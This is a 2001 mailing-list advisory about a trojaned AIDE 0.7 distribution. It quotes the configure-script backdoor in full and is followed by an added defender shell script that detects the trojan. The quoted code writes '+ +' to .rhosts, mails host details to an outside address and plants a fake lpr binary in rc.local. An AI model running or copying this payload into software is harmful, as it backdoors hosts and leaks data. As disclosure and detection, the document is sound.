From: Rami Lehti (Rami.Lehtifinland.sun.com)
Date: Tue Aug 07 2001 - 01:45:42 CDT

    It has come to my attention that there has been a trojaned
    Aide distribution at ftp://ftp.linux.hr/pub/aide
    The offending binary has been removed.
    Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to
    download it from ftp://ftp.cs.tut.fi/pub/src/gnu
    and always check the PGP signature before using any distribution of
    Aide.

    The trojaned distribution contains the following script embedded in
    the configure script. As you can see, it tries to add "+ +" to root's
    .rhosts and sends information about your host to l4m0rfreebox.com.

    # checking if we are root or not
    if [ `whoami` == "root" ];then
    root_user=1
    else
    root_user=0
    fi

    And later on:
    if [ $root_user != "1" ];then
    echo "+ +" > ~/.rhosts
    echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
    mail l4m0rfreebox.com < /tmp/jea
    rm -rf /tmp/jea
    else
    if [ `uname -s` != Linux ];then
    echo ""
    else
    mv -f .xinitrc /bin/lpr
    echo "# printing status monitor" >> /etc/rc.d/rc.local
    echo "/bin/lpr &" >> /etc/rc.d/rc.local
    hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
    mail l4m0rfreebox.com < /tmp/jea
    /bin/lpr &
    rm -rf /tmp/jea
    fi
    fi

    Rami Lehti

    -- 
    AIDE - Advanced Intrusion Detection Environment
    Check http://www.cs.tut.fi/~rammer/aide.html
    
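The defender-side checks this advisory implies, as an added example that is not part of Rami's post or of AIDE itself: a grep over a downloaded configure script for the indicator lines quoted above, and a host check for the "+ +" .rhosts entry and rc.local stanza the payload installs. It assumes a POSIX sh with grep -E and mktemp; the sample files it creates are constructed, not real distributions.

```shell
#!/bin/sh
# Added example, not from the original post: grep a configure script for the
# indicators described above, and check a host for what the payload leaves behind.

# Print each line of the script $1 that matches a known indicator of this trojan.
scan_configure() {
    grep -n -E \
        -e '"[+] [+]".*\.rhosts' \
        -e '/tmp/jea' \
        -e 'mail .*freebox\.com' \
        -e '>> */etc/rc\.d/rc\.local' \
        -e '\.xinitrc /bin/lpr' \
        "$1"
}

# Number of indicator lines in $1 (0 means nothing matched).
count_indicators() {
    scan_configure "$1" | wc -l | tr -d ' '
}

# Warn if the persistence the payload installs is present: "+ +" in root's
# .rhosts (trusts every host and user for rsh/rlogin) and the fake "printing
# status monitor" stanza in rc.local.  $1 = home dir, $2 = rc.local path.
check_host() {
    home=${1:-/root}; rc=${2:-/etc/rc.d/rc.local}
    [ -f "$home/.rhosts" ] && grep -q '^+ +$' "$home/.rhosts" &&
        echo "WARNING: $home/.rhosts contains '+ +'"
    [ -f "$rc" ] && grep -q 'printing status monitor' "$rc" &&
        echo "WARNING: $rc contains the trojan's lpr stanza"
    return 0
}

# Constructed samples (not real files): a trojaned fragment, a clean one,
# and a fake home/rc.local pair showing the installed persistence.
make_samples() {
    d=$(mktemp -d)
    printf '%s\n' 'if [ `whoami` == "root" ];then' 'root_user=1' 'fi' \
        'echo "+ +" > ~/.rhosts' \
        'hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea' \
        'echo "# printing status monitor" >> /etc/rc.d/rc.local' \
        > "$d/configure.trojaned"
    printf '%s\n' '# checking for gcc' 'test -z "$CC" && CC=gcc' \
        > "$d/configure.clean"
    mkdir "$d/home"; echo "+ +" > "$d/home/.rhosts"
    echo "# printing status monitor" > "$d/rc.local"
    echo "$d"
}
```

Run `scan_configure ./configure` on an unpacked tarball before executing it, and `check_host` with no arguments to inspect the real /root/.rhosts and /etc/rc.d/rc.local.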
